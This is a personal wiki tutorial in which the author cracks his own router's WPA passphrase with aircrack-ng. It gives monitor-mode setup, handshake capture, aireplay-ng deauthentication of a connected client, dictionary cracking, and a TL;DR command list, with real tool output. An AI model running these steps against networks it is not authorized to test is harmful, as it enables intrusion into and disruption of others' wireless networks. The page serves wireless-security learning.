From charlesreid1

Now that we've successfully walked through using Aircrack to crack WEP on our home router on the Aircrack/WEP Cracking page, let's try attacking the router in WPA encrypted mode.

Notes on wireless in Kali 2.0: Kali_2.0/Wireless_Debugging

The Background

As with the WEP attack we covered, this attack will use aircrack-ng to capture handshake packets, as many as possible, then use those packets to brute-force guess the wireless network's passphrase.

WPA or WPA2?

From here:

There is no difference between cracking WPA or WPA2 networks. The authentication methodology is basically the same between them. So the techniques you use are identical.

Here's what the security settings page might look like:

WirelessRouterWPAWPA2.png

The Hardware

The hardware for simulating this attack on my home network consisted of:

  • a router/wireless access point - this router controls the wireless network being attacked
  • a laptop running Kali Linux - this is where the attack is being launched from
  • a third party on the network (e.g., a phone or a desktop) - not sure if this is necessary

The Software

You'll need a laptop running Kali, which will have aircrack-ng installed. That should be all the software you need.

The Procedure

Set Your Router to WPA

Before doing anything else, we'll change the wireless security protocol of the router to either WPA or mixed WPA/WPA2 encryption.

Now let's pick an easy password, for the sake of example. Like, uh, the word password.

Now we've got our WPAWPA2-enabled router with our super-secure password of "password" - time to get to work.

Change Your Mac Address

See Kali/Change Mac Address

Check Wireless Devices

Now that you have your WPAWPA2 network enabled, open up your Kali laoptop. Check the wireless devices available on the computer:

$ iwconfig

Once again, we'll be using the Panda Wireless USB dongle at wlan2.

Switch Wireless Device to Monitor Mode

Now use Aircrack to put the wireless device into monitoring mode:

$ airmon-ng start wlan2

This will take wlan2 down and replace it with wlan2mon.

Now we're ready to scan available networks and find our WPAWPA2 router.

Scan Networks

Now you can scan the wireless access points around you by running:

$ airodump-ng wlan2mon

Make a note of your target router's channel number and MAC address.

Begin the Attack

Window 1: Monitor Traffic on the Network

In the first window, monitor traffic going to/from the target router by running a more targeted airodump-ng:

$ airodump-ng -d AA:BB:CC:DD:EE -c XX -w aircrack_output wlan2mon

or,

$ airodump-ng --bssid AA:BB:CC:DD:EE --channel XX -w aircrack_output wlan2mon

Make sure you've killed your prior-running airodump command, which was hopping channels, or this command will not work.

Find the Sheep

The weakness we're taking advantage of in WPA is the handshake process: when a client (an unsuspecting sheep) authenticates with the network and sends the encrypted password so the network can verify the client. If an attacker captures packets during this handshake process, they have the encrypted password and can try and crack the sheep's passphrase by brute force.

That means we need to find a sheep that will broadcast their passphrase to the router and anyone else who will listen. So once you're ready, and listening to the network, connect your sheep to the network. (This might be a computer playing internet radio, for example.)

Window 2: Deauthenticate Sheep

The next step is to deauthenticate the sheep.

In window 2, we'll use aireplay to craft deauth packets and send them to the sheep:

$ aireplay-ng -0 1 -a <access point mac address> -c <sheep mac address> wlan2mon

or,

$ aireplay-ng --deauth 1 -a <access pt mac addr> -c <sheep mac addr> wlan2mon

This will generate fake deauthentication packets and send them to the sheep. The sheep will think it has been deauthenticated and kicked off the network. Lonely and desperate and bleating madly, the sheep will begin to broadcast its packets to anyone who will listen - including its encoded passphrase.

If we're listening, we can hear it, and use Aircrack to crack it.

This is Attack Mode Zero in the Aircrack manual.

Finish the Attack

Aircrack/Cracking

Now we've got what we need in our network capture file. Let's try and crack this password.

You can use whatever you want for your wordlist, if you're attacking a network with a known passkey, just make sure it's in there. I downloaded a list of the 10,000 most common passwords ("password" is number one on the list) from SecLists on GitHub.

Now run Aircrack against the captured data to crack the WPA key, specifying the wordlist:

$ aircrack-ng -w ./10k_most_common.txt aircrack_output-05.cap 

and, if you're lucky, you'll see something like this:


                                 Aircrack-ng 1.2 rc2


                   [00:00:00] 5 keys tested (669.62 k/s)


                           KEY FOUND! [ password ]


      Master Key     : 8A D8 38 DD C7 05 39 9F 02 DE 96 0F 98 E1 C2 EF 
                       01 D0 A8 C4 75 C9 4A C3 04 32 E8 21 53 9E D5 1A 

      Transient Key  : FC BB DD FE 34 37 AC 42 D6 15 06 70 0A 2A 6B B0 
                       D6 1C 6A 5C 3B 1D EE 40 C8 20 10 D1 7C 0F 5B A2 
                       5A 92 8A 70 E6 36 2C DA 3E 36 6E CB AE F1 1B FC 
                       78 C5 54 82 BA 84 3F DE 2D 7A BD A0 BD E0 40 AB 

      EAPOL HMAC     : 84 B2 3D 30 2D A0 87 D1 A3 2A AC 14 71 28 B5 82 

Troubleshooting

Passphrase Not Found

This was the first result I saw, when I tried to crack my wireless password "password" with a wordlist that had "password" right there at the top:

$ aircrack-ng -w ./10k_most_common.txt aircrack_output-05.cap 

Opening aircrack_output-05.cap
Read 81013 packets.

   #  BSSID              ESSID                     Encryption

   1  74:85:2A:97:5B:08  Walrus                    WPA (1 handshake)

Choosing first network as target.

Opening aircrack_output-05.cap
Reading packets, please wait...

                                 Aircrack-ng 1.2 rc2


                   [00:00:00] 192 keys tested (1269.55 k/s)

                   [00:00:00] 392 keys tested (1287.03 k/s)
                       Current passphrase: cadillac                   
                   [00:00:00] 592 keys tested (1298.17 k/s)
                       Current passphrase: mariners                   
      Master Key   [00:00:00] 788 keys tested (1293.03 k/s)D8 A2 0A 61 
                       Current passphrase: commando                    
      Master Key   [00:00:00] 988 keys tested (1293.68 k/s)53 1E 22 F4 
      Transient Key  : Current passphrase: films+pic+galeries          
      Master Key   [00:00:00] 1188 keys tested (1297.01 k/s)2 B4 8F 19 
      Transient Key  : Current passphrase: vikings1                    
      Master Key   [00:00:01] 1384 keys tested (1298.15 k/s)D 64 31 3D 
      Transient Key  : Current passphrase: hotmail1                    
      Master Key   [00:00:01] 1580 keys tested (1298.30 k/s)C F2 54 2D 
      Transient Key  : Current passphrase: aviation                    
      Master Key   [00:00:01] 1776 keys tested (1298.07 k/s)9 65 C7 52 
      Transient Key  : Current passphrase: riffraff                    
      Master Key   [00:00:01] 1964 keys tested (1293.49 k/s)5 DD 08 AF 
      Transient Key  : Current passphrase: smirnoff                    
      Master Key     : EE 79 F1 E6 3B EF 37 9C A3 19 51 A8 23 CF 0D 46 
      Transient Key  : Current passphrase: skeeter1                    
      Master Key     : 60 C0  2086 24 0B 1C 72 9A 86 17 74 52 08 A8 90 
      Transient Key  : B3 18 CB 94 68 ED 4C 8A 67 DF 0C D6 29 66 8A DB 
      Master Key     : 35 33 85 0F 54 DC 5F 69 24 54 04 CE D6 D6 C9 D9 
      Transient Key  : 2F A2 7C 56 47 49 2B 81 68 37 3B 69 67 FF AF DE 
      EAPOL HMAC     : 14 24 17 98 75 9D E4 AE EB F1 5E BC D2 20 30 CE 
      Transient Key  : 21 B2 25 2B 69 56 60 2D BD 87 18 97 10 07 91 84 
      EAPOL HMAC     : 06 14 B6 BE 7B 44 9C B1 51 65 C4 85 BF F7 FF D9 
                       3D A3 16 29 55 33 10 70 C5 B0 59 B6 11 1B 2C 9E 
      EAPOL HMAC     : 69 89 39 67 39 D8 95 C3 33 26 A7 9B 31 53 B3 B7 

Passphrase not in dictionary 

Quitting aircrack-ng...

Oh?

Possible Failure Points

Aircrack can only crack pre-shared keys (PSK). Is my wireless network listed as having PSK? Yes. (AUTH column in airomon-ng)

Aircrack can only handle dictionary words and short passphrases. Is my test router's password too hard? Pretty sure that if a password cracker can't crack a password of "password," it is an abject failure.

Not letting it run long enough? I suspect this may be the issue.

Problems with packet injection? No, everything looks okay. Here are Aircrack/Packet Injection Testing notes.

Something peculiar about my network? Possibly. Almost definitely. Successful on two other different wireless router makes/models.

Wireshark for Troubleshooting

Can use Wireshark to analyze some of these packet captures. From this site: " Use Wireshark and apply a filter of 'eapol'. This displays only eapol packets you are interested in. Thus you can see if capture contains 0,1,2,3 or 4 eapol packets."

From this page comes a great explanation of how to analyze those packets.

On the first successful network, filtering for eapol packets shows that we had four different sources, which took about 10 minutes to capture.

On the second successful network, filtering eapol packets shows three different sources, and those took about 15 minutes to capture.

On the network setup that is failing, filtering eapol packets shows eapol packets coming from a single destination, despite an hour of capturing packets.

On another (failed) attempt against a network that was later successfully attacked, we had only two sources of eapol packets.

All in all, this means you may need multiple clients on the network - as I observed, the important thing is not having a lot of traffic but having a lot of clients connected and sending EAPOL packets.

TL; DR

Aright, smartass, here you go:

$ airmon-ng # list wireless devices
$ airmon-ng start wlan2 # put wlan2 in monitor mode
$ airodump-ng wlan2mon # monitor
$ airodump-ng --bssid AA:BB:CC:DD:EE -c XX -w aircrack_output wlan2mon # capture packets from target network
$ aircrack-ng -w ./wordlist.txt aircrack_output-01.cap # crack the passphrase